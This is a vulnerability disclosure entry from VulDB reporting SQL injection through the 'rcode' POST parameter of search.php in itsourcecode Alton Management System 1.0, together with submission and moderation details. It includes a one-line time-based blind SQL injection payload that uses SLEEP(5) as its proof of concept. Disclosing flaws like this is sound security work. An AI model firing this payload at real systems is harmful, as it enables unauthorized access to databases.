Submit #381089: itsourcecode Alton Management System 1.0 SQLi search.phpinfo

Titleitsourcecode Alton Management System 1.0 SQLi search.php
DescriptionThe rcode parameter can be passed in for querying on the "search.php" page, but due to the code's lax filtering of this parameter, it can lead to SQL injection. -------------------POC--------------- Parameter: rcode (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: rcode=1' AND (SELECT 7363 FROM (SELECT(SLEEP(5)))sBIE) AND 'vFRq'='vFRq
Source⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-1.md
User
 Dee.Mirage (UID 71702)
Submission27.07.2024 12:20 (vor 11 Monaten)
Moderation30.07.2024 15:29 (3 days later)
StatusAkzeptiert
VulDB Entry273142 [itsourcecode Alton Management System 1.0 search.php rcode SQL Injection]
Points20

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!